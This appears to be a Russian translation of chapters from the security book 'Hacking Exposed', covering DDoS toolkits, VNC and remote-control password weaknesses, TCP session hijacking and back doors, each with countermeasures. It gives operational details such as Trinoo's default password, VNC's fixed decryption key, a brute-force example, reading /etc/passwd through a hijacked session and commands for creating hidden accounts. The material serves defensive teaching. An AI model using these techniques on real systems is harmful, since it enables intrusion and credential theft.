TFN Пакет TFN (Tribe Flood Network), разработанный хакером Микстером (Mixter), является первым общедоступным средством реализации атаки DDoS, который предназначен для использования в системе UNIX. В состав пакета входит как клиентский, так и серверный компонент. Это позволяет взломщику установить серверную часть на удаленном взломанном узле, а затем с помощью нескольких команд, введенных с использованием клиентной части, инициировать полномасштабную распределенную атаку DoS. С помощью пакета TFN можно реализовать атаки с использованием ICMP-, UDP-пакетов, пакетов SYN, а также атаку Smurf. Помимо этих компонентов, в состав пакета TFN входит модуль, позволяющий получить доступ к удаленной командной оболочке, связанной с TCP-портом. Контрмеры Обнаружение Для выявления атак TFN существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра , Zombie Zapper от группы Razor и find_ddos, разработанный центром NIPC (National Infrastructure Protection Center). Предотвращение Конечно, наилучшая зашита компьютеров от использования в качестве "зомби" заключается в предотвращении их взлома на начальной стадии атаки. Это означает, что нужно реализовать все шаги, описанные в главе 8: ограничьте использование служб, установите модули обновления операционной системы и приложений, задайте адекватные разрешения на использование каталогов и файлов, а также воспользуйтесь всеми другими рекомендациями. Trinoo Как и TFN, в состав пакета Trinoo входит программа удаленного управления (клиент), которая взаимодействует с основной программой, передающей команды программе-демону (серверу). Взаимодействие между клиентом и основной программой осуществляется посредством соединения через TCP-порт 27665. При этом обычно используется пароль betaalmostdone. Связь основной программы с сервером устанавливается через UDP-порт 27444, а в обратном направлении — через LJDP-порт 31335. Контрмеры: защита от использования пакета Тrinоо Обнаружение Для выявления атак Trinoo существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра, Zombie Zapper от группы Razor () и find_ddos , разработанный центром NIPC (National Infrastructure Protection Center). Предотвращение Как и в случае пакета TFN, наилучшая зашита состоит в применении всех рекомендаций, приведенных в главе 8. Stacheldraht Пакет Stacheldraht комбинирует возможности Тrinоо и TFN и является мощным деструктивным средством, реализующим зашифрованный сеанс telnet между главным и подчиненным модулем. Теперь взломщик может блокировать системы выявления вторжений и благодаря этому получать неограниченные возможности по генерации условия DoS. Как и TFN, пакет Stacheldraht предоставляет возможность инициирования ICMP-, UDP-, SYN- и Smurf-атак. Взаимодействие клиента с сервером осуществляется через комбинацию TCP- и ICMP-пакетов ECHO REPLY. Контрмеры Обнаружение Для выявления атак Stacheldraht существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра , Zombie Zapper от группы Razor и find_ddos, разработанный центром NIPC (National Infrastructure Protection Center). Предотвращение Как и ранее, лучше всего предотвратить использование компьютеров в качестве "зомби". Это означает, что необходимо учесть все рекомендации, приведенные в главе 8, т.е. ограничить использование служб, установить модули обновления операционной системы и приложений, задать необходимые разрешения на использование файлов/каталогов и т.д. TFN2K Аббревиатура TFN2K — это обозначение пакета TFN 2000. который является преемником пакета TFN, разработанного хакером Микстером (Mixter). Это одно из самых последних средств DDoS, которое принципиально отличается от своего предшественника и позволяет в процессе взаимодействия использовать порты с произвольно выбранными номерами. Благодаря этому можно обойти блокирование портов на пограничных маршрутизаторах. Как и TFN, пакет TFN2K поддерживает SYN-, UDP-, ICMP- и Smurf-атаки. а, кроме того, позволяет случайным образом переключаться между различными методами проведения атаки. Однако в отличие от алгоритма шифрования, используемого в пакете Stacheldraht, в TFT2K применяется более слабый алгоритм Base 64. Контрмеры Обнаружение Дта выявления атак TFN2K существует несколько механизмов, и соответствующие средства можно найти в Internet. К заслуживающим внимания инструментам можно отнести следующие: DDOSPing Робина Кейра , Zombie Zapper or группы Razor и find_ddos , разработанный центром N1PC (National Infrastructure Protection Center). Предотвращение Как и ранее, лучше всего предотвратить использование компьютеров в качестве "зомби". Это означает, что необходимо учесть все рекомендации, приведенные в главе 8, т.е. ограничить использование служб, установить модули обновления операционной системы и приложений, задать необходимые разрешения на использование файлов/каталогов и т.д. WinTrinoo Широкой общественности программа WinTrinoo впервые была представлена группой Razor. Это версия пакета Trinoo, предназначенная для использования в системе Windows. Это средство представляет собой программу типа "троянский конь", которая обычно называется service, ехе (если не была переименована) и имеет размер 23,145 байт. Контрмеры Для того чтобы выявить программу WinTrinoo, нужно проверить сеть на предмет открытого порта с номером 34555 или выполнить поиск файла с именем service. ехе (если он не был переименован) размером 23,145 байт. Кроме такого "ручного" способа можно воспользоваться также антивирусной программой Norton Antivirus компании Symantec, которая автоматически изолирует этот файл еше до его запуска. |
Локальные атаки DoS Несмотря на то что удаленные атаки DoS получили большее распространение, локальные атаки тоже способны принести немало бед. Существует множество многопользовательских систем, в которых атаку DoS может инициировать авторизованный пользователь. Большинство локальных атак основано на захвате ресурсов или на использовании изъянов в программном обеспечении и направлено на то, чтобы запретить доступ легитимным пользователям. В системах NT и UNIX существуют сотни возможностей реализации локальных атак DoS, однако мы познакомимся с захватом ресурсов и использованием ошибок в программном обеспечением для систем Windows NT и UNIX соответственно. Терминальный сервер Windows NT и процесс proquota. ехе Классическим примером атаки, направленной на захват ресурсов, является использование свободного дискового пространства сверх выделенной квоты. Если функции квотирования дискового пространства в мире UNIX давно ни у кого не вызывают удивления, то в системе Windows NT эта возможность является относительно новой. Терминальный сервер Windows NT позволяет обычному пользователю применить функцию квотирования дискового пространства и заполнить системный диск (%systemdrive%). После этого пользователи, у которых отсутствует кэшированный профиль доступа, не смогут обратиться к системе. В процессе этой атаки пользователи, у которых превышена дисковая квота, не смогут завершить свою работу. Однако для того, чтобы обойти это ограничение, можно удалить процесс proguota. ехе. Это можно осуществить, поскольку владельцем этого процесса является пользователь, а не системная учетная запись. Контрмеры Практика подсказывает, что системные файлы и пользовательские данные лучше всего хранить в разных разделах. Эта аксиома как нельзя лучше подходит к приведенному примеру. Переменная %systemdrive% должна указывать на другой диск, а не на тот, на котором хранятся данные пользователей. Кроме того, поместите профили на незагружаемом разделе и используйте их только при необходимости. Паника ядра В ядре системы Linux версии 2.2.0 появлялась потенциальная возможность для возникновения условия DoS, если программа idd, используемая для печати зависимостей совместно используемых библиотек, применялась для печати определенных файлов ядра. Этот изъян был связан с вызовом функции munmap (), используемой для отображения файлов или устройств в оперативную память. При определенных обстоятельствах функция munmap () могла перезаписать важные области памяти, используемые ядром, и вызвать в системе панику и ее перезагрузку. Хотя такая ситуация не выглядит необычной, она все же иллюстрирует основную концепцию, на которой основано большинство направленных на ядро атак. В большинстве случаев непривилегированный пользователь может воспользоваться изъяном в программном обеспечении и повредить важную область памяти, применяемую ядром. Конечным результатом подобной деятельности практически всегда является паника ядра (panic kernel). Контрмеры против паники ядра Модуль обновления, позволяющий заделать эту брешь в программном обеспечении, был встроен в ядро версии 2.2.1. Практически ничего нельзя сделать для исправления ошибок в операционной системе и связанных с ней компонентах, таких как ядро, если их исходный код остается недоступным. Однако во многих свободно распространяемых версиях системы UNIX вполне возможно проверить исходный код и при необходимости внести изменения. |
Резюме Как вы убедились при чтении этой главы, существует много типов атак DoS, с использованием которых злоумышленники могут нарушить функционирование различных служб. Атаки, направленные на насыщение полосы пропускания, являются наиболее жестокими из-за их способности захвата трафика. Атаки с захватом ресурсов уже используются многие годы, и взломщики продолжают применять их с большим успехом. Бреши в программном обеспечении особенно популярны у взломщиков, поскольку сложность реализации стека протокола IP и связанных с ним программ постоянно повышается. И наконец, атаки DNS чрезвычайно эффективны при использовании унаследованных изъянов важнейших служб, являющихся фундаментом Internet. Фактически, некоторые эксперты по вопросам безопасности считают, что теоретически вполне возможно инициировать атаку DoS против самой сети internet, если через протокол BGP воспользоваться данными о маршрутах. Этот протокол интенсивно применяется большинством магистральных провайдеров. |
Глава 13. ИЗЪЯНЫ СРЕДСТВ УДАЛЕННОГО УПРАВЛЕНИЯ
|
Изъяны средств удаленного управления Неотъемлемой чертой глобальной единой экономики является то, что и управлять ею нужно глобально. Вспомогательный персонал не всегда может оказаться на месте, чтобы подойти к закапризничавшему компьютеру и устранить проблему. Какой же выход? Программное обеспечение удаленного управления. |
Обзор программ удаленного управления Каждая программа, предназначенная для работы в сети, ожидает установки соединений, открывая для этого определенные порты узла. Число и тип этих портов полностью определяется самой программой. Сканируя порты какого-то компьютера, можно определить все работающие на нем программы удаленного управления. Остается только удивляться, как много пользователей устанавливают такое программное обеспечение без соответствующих санкций и требуемой поддержки.
Как всегда, для одновременного сканирования нескольких сетей и обнаружения всех систем, от которых можно ждать неприятностей, мы рекомендуем использовать сценарий на языке Perl, который можно найти на Web-узле http://www.hackingexposed.com. |
Соединение Как только взломщик получит всю необходимую информацию о службах удаленного управления рабочих станций и серверов, скорее всего, он попытается получить к ним доступ. После установки с параметрами, используемыми по умолчанию, практически все приложения удаленного управления позволяют устанавливать соединение любому пользователю. Причем для этого не требуется указывать ни имя, ни пароль. (Взломщикам это нравится.) |
Изъяны программ удаленного управления Часто приходится слышать, что уровень защищенности узла определяется прочностью самого слабого звена. Однако по отношению к программному обеспечению удаленного управления дело обстоит несколько иначе. Если узел удалось взломать (см. главу 5), то злоумышленники смогут воспользоваться обнаруженными изъянами и позже подключиться вполне законным путем. Например, некоторые старые программные продукты не шифруют имена и пароли пользователей, что дает возможность взломщикам извлечь их из файлов, с экрана монитора, или, еще хуже, из сетевого трафика. Единственный способ убедиться в том, что программные продукты надежно защищены, заключается в проведении их тестирования.
Незашифрованные имена пользователей и пароли Программа Remotely Possible 4.0 компании Computer Associates не обеспечивает никакой защиты имен пользователей и паролей. Как видно из рис. 13.1, в файле \PROGRAM FILES\AVALAN\ REMOTELY POSSIBLE\MAIN.SAB. Эти данные хранятся в текстовом формате — все ключи от королевства в одном месте!
После обнаружения этого факта компания Computer Associates выпустила модуль обновления, обеспечивающий некоторый уровень шифрования конфиденциальной информации. Предполагалось, что этот модуль обновления вместе с новой версией программного продукта, ControlIT 4.5, позволит зашифровывать пароли, хранящиеся в файле VAIN . SAB. Весь вопрос в том, насколько надежной окажется такая защита. Пароли, шифруемые с помощью алгоритма подстановки Предполагалось, что в программе ControlIT 4.5 (новой версии программы Remotely Possible 4.0) будут устранены недостатки предыдущей версии, в которой имена пользователей и пароли хранились в виде незашифрованного текста. Однако вместо реализации надежного алгоритма шифрования компания применила простой алгоритм подстановки, который, кроме того, используется только для шифрования паролей. Например, пароль abcdabcd выглядит следующим образом. р | x d р | х d |
Раскрываемые пароли Программа Revelation компании SandBoy Software (http://www.sandboy.com) представляет собой одно из незаменимых средств. Единственный исполняемый файл размером 14 Кбайт позволяет получить хранящиеся в оперативной памяти пароли многих популярных программ удаленного управления. |
Загрузка профилей Как только взломщикам удастся проникнуть в систему NT и каким-нибудь способом получить административные привилегии, они смогут загрузить свои собственные профили (например, файлы . CIF или MAIN. SAB) и автоматически получить доступ к системе, пользуясь своим собственным паролем! Этой атаке подвержена как программа pcAnywhere, так и Remotely Possible 4.0. Для этого взломщику достаточно выполнить следующие действия. Контрмеры Для повышения защищенности и устранения перечисленных выше недостатков можно воспользоваться несколькими приемами. Выполнение следующих шагов позволит значительно повысить уровень безопасности установленного программного обеспечения. Использование паролей Хотя необходимость этой меры предосторожности очевидна и интуитивно понятна всем администраторам, имена пользователей и пароли на удаленных узлах применяются далеко не всегда. Производители программ тоже не всегда стремятся помочь в данной ситуации, надеясь на администраторов. Как видно из рис. 13.2, схема аутентификации, используемая в программе pcAnywhere по умолчанию, является весьма либеральной. Чтобы исправить эту ситуацию, просто установите режим Specify individual caller privileges.
Усиленные требования к паролям Некоторые приложения, такие как pcAnywhere, позволяют повысить требования к используемым паролям, например сделать их чувствительными к регистру. Чтобы активизировать этот режим, откройте диалоговое окно свойств сети (NETWORK properties). Затем перейдите во вкладку Security Options и установите флажок Make passwords case sensitive. Как видно из рис. 13.3, этот режим по умолчанию отключен. Альтернативная аутентификация Большинство приложений позволяет активизировать процедуру аутентификации в форме, отличной от принятой в системе NT. Однако по умолчанию этот режим обычно не активизирован. Несмотря на то, что при этом придется поддерживать два набора имен и паролей пользователей, такая возможность с успехом может расстроить планы взломщиков.
В программах Remotely Possible и ControlIT по умолчанию используются собственные механизмы аутентификации, тогда как в Timbuktu и ReachOut по умолчанию применяется аутентификация NT. При этом проблема состоит в том, что после успешного взлома злоумышленник сразу же получает пароли всех пользователей приложений удаленного управления. Дополнительные возможности использования паролей Программы Timbuktu и pcAnywhere предоставляют дополнительные возможности использования паролей, которыми следует пользоваться при любой возможности. Так, в pcAnywhere можно защитить паролем профили как исходящего, так и входящего соединения. Это не позволит кому-либо постороннему выведать пароль аутентификации, скрытый за звездочками. Установить пароль на доступ к профилям программы pcAnywhere (т.е. повысить уровень безопасности) можно в диалоговом окне NETWORK Properties во вкладке Protect Item, как показано на следующем рисунке.
Выход из системы после завершении сеанса связи Программы Remotely Possible/ControlIT, pcAnywhere и ReachOut можно настроить так, чтобы после окончания сеанса связи выполнялся также выход из системы. Такая возможность оказывается чрезвычайно важной, поскольку если администратор забудет выйти из системы после выполнения своей работы, кто-либо другой сможет воспользоваться его привилегиями. Кодирование сообщений во время сеанса связи В более ранних версиях многих программ удаленного управления можно было перехватить имена пользователей и пароли во время их передачи по сети или разгадать простые алгоритмы шифрования. Удостоверьтесь в том, что используется наивысший уровень шифрования, обеспечиваемый программным обеспечением. Наилучшим средством для проверки надежности алгоритмов шифрования является программа анализа сетевых пакетов SnifferPro от компании Network Associates (http://www. nai.com) Остается только удивляться, насколько слабыми оказываются алгоритмы шифрования, применяемые в некоторых программных продуктах. Ограничение числа попыток регистрации Большинство приложений позволяет ограничить количество попыток регистрации. В случае превышения заданного значения система будет заблокирована. Данная возможность хороша тем, что может отпугнуть взломщика, и он обратит свое внимание на менее защищенные системы. Даже если этого не произойдет, администратор сможет узнать об атаке и предпринять соответствующие меры. Мы рекомендуем ограничиться тремя неудачными попытками регистрации. Учет неудачных попыток регистрации Следует регистрировать как успешные, так и неудачные попытки регистрации. Для этого можно использовать либо журнал регистрации событий системы NT, либо соответствующие файлы самих приложений удаленного управления. Эта информация значительно облегчит обнаружение попыток взлома и выявление злоумышленников. Блокирование пользователей, которым не удалось зарегистрироваться Это одна из наиболее важных возможностей. Однако в большинстве приложений удаленного управления она отсутствует. ReachOut от компании Stac Electronics оказалась единственной из всех протестированных нами программ, в которой реализован так называемый режим IntmderGuard (защита от нарушителей). Для активизации этого важного режима выполните следующие действия. Изменение порта, прослушиваемого по умолчанию Многие не рассматривают изменение порта, используемого по умолчанию, как эффективную меру повышения безопасности, поскольку в ее основе лежит внутренне противоречивая парадигма "безопасность за счет сокрытия". Однако полученный нами практический опыт говорит о том, что применение подобных правил является достаточно эффективным. Другими словами, для обеспечения безопасности нужно предпринимать любые возможные меры. Пусть данная мера не позволит полностью защитить систему, но по крайней мере она может задержать дальнейшее продвижение взломщика, |
Какой пакет является наилучшим с точки зрения безопасности К сожалению, на поставленный вопрос ответить нелегко. Каждый программный продукт имеет свои преимущества и недостатки. Наилучший пакет должен сочетать в себе возможности различных программ. Обладая всеми другими современными возможностями, он, скорее всего, оказался бы слишком сложным. Далее приводится краткое описание основных средств удаленного управления, а также их сравнительная характеристика. |
pcAnywhere На современном рынке программа pcAnywhere компании Symantec (http://www.symantec.com) является одной из самых популярных. В значительной мере ее притягательность для потребителя определяется ее безопасностью. У всех приложений есть свои недостатки, но по сравнению с другими программными продуктами pcAnywhere обладает наиболее мощными средствами обеспечения безопасности. К другим возможностям относятся надежное шифрование паролей, механизм альтернативной аутентификации, установка паролей на файлы профилей и конфигурационных параметров, выход пользователя из системы после завершения сеанса связи, шифрование сетевого трафика, ограничение числа попыток регистрации, а также регистрация неудачных попыток. К сожалению, как и многие другие приложения, pcAnywhere не способна противостоять программе Revelation, предназначенной для получения пароля. Более подробную информацию по этому поводу можно найти в . разделе этой главы "Раскрываемые Пароли". |
ReachOut Программа ReachOut компании Stac Electronics (http://www.stac.com)— еще один добротный программный продукт, предназначенный для удаленного управления. Однако он предоставляет меньше возможностей для обеспечения безопасности. В этой программе отсутствуют средства реализации строгой политики выбора паролей, альтернативной аутентификации, а также защиты паролем файлов профилей и конфигурационных параметров. Однако не все упрощения программы ReachOut являются отрицательными. Она использует единственный порт TCP/UDP с номером 43188, что значительно ограничивает возможности взломщиков. |
Remotely Anywhere Remotely Anywhere (http://www.remotelyanywhere.com) является новичком среди программ данного класса, однако, несмотря на это, выглядит многообещающей. Этот программный продукт позволяет удаленно управлять рабочим столом, а по возможностям общего системного управления программа Remotely Anywhere выделяется среди других средств. Кроме обычных функций удаленного управления, с помощью Web-броузера она позволяет выполнять почти все административные функции, имеющиеся в системе NT.
|
Remotely Possible/ControllT ControlIT — известный и популярный продукт компании Computer Associates (http://www.cai.com). Однако эта программа предоставляет наиболее низкий уровень безопасности. Помимо того что в ее более ранних версиях использовались имена и пароли в виде незашифрованного текста, даже в последних версиях реализованы ненадежные алгоритмы шифрования, что делает пароли уязвимыми для злоумышленников. Производители не обеспечили поддержки строгой политики использования паролей, а также возможности установки пароля для доступа к файлам профилей и конфигурационных параметров. Кроме того, в программе отсутствуют средства аудита неудачных попыток регистрации и защита от применения программы Revelation. |
Timbuktu Приложение Timbuktu Pro 32 компании Netopia (http://www.netopia.com) — еще одно средство удаленного управления, широко применяемое в больших организациях. Эта программа предоставляет все стандартные инструменты удаленного управления, а также несколько дополнительных возможностей. Этот программный продукт позволяет совместно использовать экран нескольким пользователям одновременно, а также обладает такими надежными средствами защиты, как ограничение минимальной длины пароля, управление повторным использованием паролей, альтернативная аутентификация |
Virtual Network Computing (VNC) Программа Virtual Network Computing разработана в Англии, в лаборатории AT&T Research Labs Кембриджского университета. Ее можно найти по адресу https://www.comparitech.com/vpn/what-is-a-vnc-and-how-does-it-differ-from-a-vpn/. Программа обладает многими уникальными возможностями. Во-первых, ее можно использовать на многих платформах. Этот программный продукт можно устанавливать на компьютеры под управлением системы Windows, Linux и Solaris, а просматривать — в Windows, Linux, Solaris, Macintosh и даже с помощью Windows СЕ. Кроме того, эта программа имеет интерфейс на языке Java, что позволяет ее использовать через такие Java-совместимые броузеры, как Netscape Communicator и Microsoft Internet Explorer. Лучше всего то, что программа VNC является бесплатной!
Ниже каждая из этих атак будет рассмотрена более подробно. Прямой подбор паролей VNC
Основным механизмом защиты сервера VNC от несанкционированного доступа является пароль, выбранный системным администратором. В этой книге уже не раз отмечалось, что взлом проще всего осуществить, если используются ненадежные пароли. Поскольку серверу VNC зачастую предоставляются высокие привилегии, решительно настроенный взломщик, проявив определенное упорство, сможет подобрать пароль сервера VNC "в лоб", простым перебором. Для подбора паролей VNC можно воспользоваться дополнительной программой rfbproto.c , которую можно применить к клиентскому приложению vncviewer. С помощью команды patch программу rfbproto.c нужно применить к пакету vnc-3.3.3rl_unixsrc.tgz. В следующем примере демонстрируется, как легко подобрать пароль сервера VNC. [crush] # vncviewer 192.168.1.101 Модифицированный клиент vncviewer быстро перебрал предоставленный список паролей и отгадал пароль test. После этого программа vncviewer соединилась с удаленным сервером и взломщик получил полный контроль над системой. Подобный подбор паролей производится очень быстро, и сервер VNC никак не реагирует на неудачные попытки регистрации. Контрмеры: защита от подбора паролей VNС
При настройке сервера VNC важно выбрать надежный пароль. В нем должно содержаться не меньше восьми символов. Пароль не должен быть словом или производной от слова, найденного в словаре. Не забывайте о том, что пароль — это единственная преграда, стоящая между взломщиком и системой. Так что выбирайте его очень внимательно! Перехват сетевого трафика
Если пакет VNC установлен без каких бы то ни было модификаций, то после аутентификации шифрование потока сообщений между клиентом и сервером не выполняется. Не стоит надеяться на то, что если этот поток сообщений сжат, то его труднее перехватить, чем, скажем, в сеансе telnet. Поскольку файлы с исходным кодом VNC найти очень легко, то не составит особого труда и разработать специальный перехватчик сообщений VNC. Поэтому установка соединения с сервером VNC без применения шифрования сопряжена с большим риском. Хотя исходный пароль VNC передается с использованием механизма "вопрос/ответ", весь поток сообщений передается в незашифрованном виде. Вполне возможно, что взломщик сможет отследить передаваемые сообщения и перехватить пароли, вводимые пользователями при регистрации. Контрмеры: предотвращение перехвата сетевого трафика
К счастью, существуют различные механизмы, которые можно использовать для шифрования трафика VNC. Первым и основным из них является использование оболочки ssh, с помощью которой можно организовать защищенный канал между клиентом и сервером VNC. . Кроме того, к исходному коду пакета VNC можно применить дополнительные модули (http://web.mit.edu/thouis/vnc/), которые позволяют реализовать шифрование по открытому ключу. И наконец, для контроля каждого IP-адреса, с которого происходит доступ, можно использовать ТСР-оболочки (http://www.uk.research.att.com/vnc/archives/1998-09/0168.html). Ненадежный метод хранения паролей VNC
В октябре 1999 года Конд Вампиро (Conde Vampiro) сообщил о некоторых изъянах программы VNC (http://www.roses-labs.com/advisory/RLvncbug.txt). Самый серьезный недостаток связан с тем, как служба VNC хранит пароль сервера VNC (а именно в системном реестре Windows). Хотя пароль сервера VNC шифруется с помощью алгоритма 3DES, при этом пароль каждый раз сохраняется с использованием фиксированного ключа (23 82 107 6 35 78 88 7). Это еще один наглядный пример неумелого применения надежного алгоритма шифрования (3DES). Поскольку ключ известен, то можно без проблем расшифровать пароль любого сервера VNC. /*поместите в массив р[] хеш-код пароля*/ После этого можно скомпоновать исполняемый файл vndec, а затем запустить его. [shadow]# vncdec Как видно из примера, пароль сервера test без особых усилий можно перевести в незашифрованный текстовый формат. Контрмеры против ненадежного хранения паролей VNС
В последней версии программы, доступной во время написания данной книги, этот недостаток все еще не был устранен. Наилучшей зашитой от доступа взломщиков к системному реестру является использование средств обеспечения безопасности на уровне серверов. В главах 5 и 6 приведен исчерпывающий список мер предосторожности систем Windows NT и 2000. |
Citrix Клиентская программа ICA (Independent Computing Architecture) и программа MultiWin компании Citrix обеспечивают возможность реализации многопользовательской среды в Windows NT, являющейся однопользовательской операционной системой (конечно, терминальный сервер системы NT и Win 2000 с терминальными службами являются исключениями). Серверный продукт WinFrame и программа MetaFrame, предназначенная для использования вместе с NT Terminal Server, предосташшют то, что в мире UNIX имеется уже несколько десятков лет: многопользовательские возможности. |
Резюме Программное обеспечение удаленного управления существенно облегчает управление распределенными сетевыми узлами. Настроив эти программы надлежащим образом, администратор может облегчить свою жизнь, соединяясь с рабочими станциями пользователей и устраняя практически любую проблему. |
Глава 14. РАСШИРЕННЫЕ МЕТОДЫ
|
Расширенные методы В предыдущих главах уже были рассмотрены многие средства, используемые хакерами. Хотя мы и пытались систематизировать все стандартные инструменты, некоторые из них все же не укладываются в приведенную выше классификацию. В данной главе описываются несколько категорий таких средств, каждая в отдельном разделе: "Захват сеанса", "Потайные ходы", "Троянские кони" (троянский конь (Trojan horse) — это такая программа, которая под прикрытием некоторых полезных действий на самом деле скрытно выполняет совсем другие операции), "Разрушение системного окружения..." и "Социальная инженерия". |
Захват сеанса Сетевые устройства поддерживают весь корпоративный поток сообщений. Каждое сообщение электронной почты, каждый файл, каждый номер кредитной карточки клиента передается по сети и обрабатывается этими устройствами. Очевидно, что обеспечение их безопасности является первоочередной задачей. Поэтому никогда нельзя исключать возможности, что сетевой трафик будет перехвачен злоумышленником. Ниже вы узнаете, как это можно осуществить с помощью так называемого захвата соединения TCP (TCP hijacking). Juggernaut Одна из первых попыток применить на практике теорию захвата TCP была предпринята Майком Шиффманом (Mike Schiffman), в результате чего появился продукт Juggernaut (возможно, многие вспомнят Майка по его предыдущей программе. Появление этого бесплатного программного продукта оказалось революционным в том отношении, что с его помощью можно было "шпионить" за соединением TCP, а затем на некоторое время его захватывать. Это позволило взломщикам вводить команды в качестве легитимного пользователя. Например, если сетевые устройства используются в сети с множественным доступом, то взломщики могут отслеживать соединения, а затем перехватить сеанс telnet или ввести пароль для устройств Cisco. Juggernaut Одной из лучших возможностей программы Juggernaut является функция simplex connection hijack (захват симплексного соединения). Эта возможность позволяет взломщику посылать команды в локальную систему. Применение режима interactive connection hijack (захват интерактивного соединения) всегда было затруднено, поскольку из-за большого потока сообщений АСК связь часто прерывалась. Однако зачастую возможности захвата симплексного соединения оказывается вполне достаточно. Она позволяет взломщику отправить, например, команду enable password О hello, которая выполнится на удаленном узле и отменит шифрование пароля. Hunt Утилита Hunt (ее можно найти на Web-узле http://www.cri.cz/-kra/index.html#HUNT) — это еще одна программа перехвата, отличающаяся стабильностью работы. Ее автор, Павел Крауз (Pavel Krauz) создал замечательную программу, которая наглядно демонстрирует недостатки протокола TCP. --- Main Menu---rcvpkt 1498, free/alloc pkt 63/64 --- В процессе наблюдения за сеансом telnet в системе UNIX взломщик может получить ценную информацию, например (как видно из предыдущего примера) пароль пользователя root. Утилита Hunt предоставляет также возможность передачи команд на удаленный узел и их выполнения. Например, взломщик может передавать команды, а результат их выполнения будет отображаться только на его компьютере, что в значительной мере затрудняет его обнаружение. ---Main Menu--- rcvpkt 76, free/alloc pkt 63/64--- Как видно из приведенного примера, на удаленный узел может быть передана довольно коварная команда (cat /etc/passwd), а полученный результат отобразится лишь на компьютере взломщика. Контрмеры против захвата соединений Применение шифрующих коммуникационных протоколов, например IPSec или SSH, позволит значительно снизить или свести к нулю эффективность таких перехватов данных. Когда-то считалось, что технология сетей с коммутацией пакетов обеспечивает адекватную защиту от взломов подобного рода, но с тех пор средства сетевого мониторинга стали настолько хитроумными, что при определенных обстоятельствах они позволяют добиться желаемого результата (см. описание утилиты dsnif f в главе 8). Поэтому кодирование информации является самой лучшей защитой. |
"Потайные ходы" Если непрошеные гости обоснуются в системе, избавиться от них бывает трудно. Даже если брешь, которой они воспользовались, будет найдена и закрыта, злоумышленники могут обеспечить специальный механизм и быстро получить доступ в любое время. Такой механизм называется потайным ходом (back door). Создание фиктивных учетных записей Почти каждому системному администратору известно, что учетные записи с правами суперпользователя — это такие ресурсы, которые легко защищать и контролировать. А вот учетные записи, равные по привилегиям суперпользователю, но имеющие неприметные имена, отследить намного труднее. Злоумышленник обязательно попытается создать такие учетные записи. NT/2000 В Windows NT/2000 привилегированные локальные учетные записи легко создать с помощью следующих команд. net user <имя_пользователя><пароль>/ADD С помощью команды net group можно добавить пользователя в глобальную группу. Вспомните, что в системе NT есть отличие между локальной (содержащейся только в локальной базе данных SAM) и глобальной (из доменной базы данных SAM) группами. Встроенные локачьные группы обычно предоставляют более широкие возможности, поскольку с их помощью можно предоставлять различный уровень доступа к системным ресурсам. В операционную систему Win 2000 добавлены новые универсальные группы и локальные группы домена. По сути, эти понятия являются метадоменными, так как они могут быть членами любого домена, принадлежащего дереву или лесу. C:\>net group "Enterprise Admins" В первую очередь нужно просмотреть встроенные группы: Administrators, Domain Admins, Enterprise Admins и Schema Admins (на контроллерах домена), а также различные локальные группы операторов. UNIX В системе UNIX фиктивные учетные записи создаются и идентифицируются аналогичным образом. Как правило создаются безобидные учетные записи с нулевыми значениями идентификаторов UID и GID. Следует проверить также учетные записи с таким же идентификатором GID, что и у пользователя root, а затем проверить совпадение свойств групп в файле /etc/groups. Кроме того, такие учетные записи легко выявить по содержимому файла /etc/passwd. Novell В системе NetWare типичным является создание "осиротевших" объектов, т.е. создание, например, контейнера с одним пользователем, а затем передача этому новому пользователю прав опекунства над родительским контейнером. Если взломщик имеет возможность постоянно регистрироваться в дереве NDS, то эту ситуацию не сможет исправить даже администратор. Более подробную информацию о "потайных ходах" системы NetWare можно найти в главе 7. Загрузочные файлы В предыдущих главах много говорилось о "потайных ходах", которые создаются с помощью механизмов загрузки, поддерживаемых различными платформами. Такой способ стал излюбленным методом злоумышленников, поскольку он позволяет устанавливать ловушки, которые активизируются при каждом перезапуске системы неосмотрительными пользователями. NT/2000 В операционной системе Windows NT в первую очередь нужно проверить различные папки, находящиеся в папке Startup: %systemroot%\profiles\%username%\ start menu\programs\startup (папка All Users будет использоваться независимо от того, кто из пользователей зарегистрировался интерактивно). Кроме того, для запуска программ типа "троянский конь" или для установки "потайного хода" при каждом запуске системы взломщики могут воспользоваться параметрами системного реестра. Нужно проверить следующие параметры
В этих параметрах хранятся данные многих из потенциально опасных программ. Например, программа Back Orifice 2000 (ВО2К; см. ниже) устанавливается как служба удаленного администрирования (Remote Administrator Service) в параметре RunServices. Использование броузера Web для загрузки кода Появление в мае 2000 года сценария ILOVEYOU, написанного на языке Visual Basic, послужило свидетельством того, что есть и другие способы запуска исполняемого кода: это установка начальной страницы, загружаемой при запуске Web-броузера. http://www.skynet.net/-[переменная]/ Данный адрес URL содержался в параметре системного реестра HKSU\Software\ Microsoft\Internet Explorer\Main\-Start Page. Этот сценарий изменял также несколько параметров системного реестра, включая тот, который запускает загруженные двоичные файлы при перезагрузке системы (предполагалось, что к нему был указан путь), и тот, который удаляет первоначальную страницу запуска.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX Конечно, в зависимости от степени доверчивости следующего пользователя, запускающего броузер, для выполнения этого файла перезагрузка может и не понадобиться. Последние версии Internet Explorer перед пересылкой определенных типов файлов, таких как исполняемые файлы . ЕХЕ и . СОМ, по умолчанию выводят на экран окно подтверждения. В зависимости от ответа пользователя на вопрос в диалоговом окне, показанном на рис. 14.1, данный файл может быть запущен сразу после начала работы Web-броузера. Контрмера: не запускайте исполняемые файлы, найденные в Internet! Должно быть понятно и без слов (хотя на протяжении многих лет это повторяется много раз): нужно быть предельно осторожным по отношению к исполняемым файлам, загружаемым из Internet. Запуск файлов с удаленного сервера — это путь, ведущий прямо к катастрофе. Вместо этого лучше загрузить их на свой компьютер локально, проверить на наличие вирусов, по возможности проанализировать содержимое (например, файлов сценариев или командных файлов), а затем протестировать их на какой-нибудь второстепенной системе. UNIX В системе UNIX взломщики часто помещают программы, предназначенные для создания "потайного хода", в файлы rc.d. Следует проверить каждый из таких файлов и убедиться, что в них не содержится ни одной незнакомой программы или такой, которая была бы недавно добавлена. Для внедрения ловушек может быть использован также файл inetd.conf. В этом файле находятся параметры демона inetd, суперсервера Internet системы UNIX, который при необходимости динамически запускает различные процессы, такие как FTP, telnet, finger и т.д. В этом файле также можно 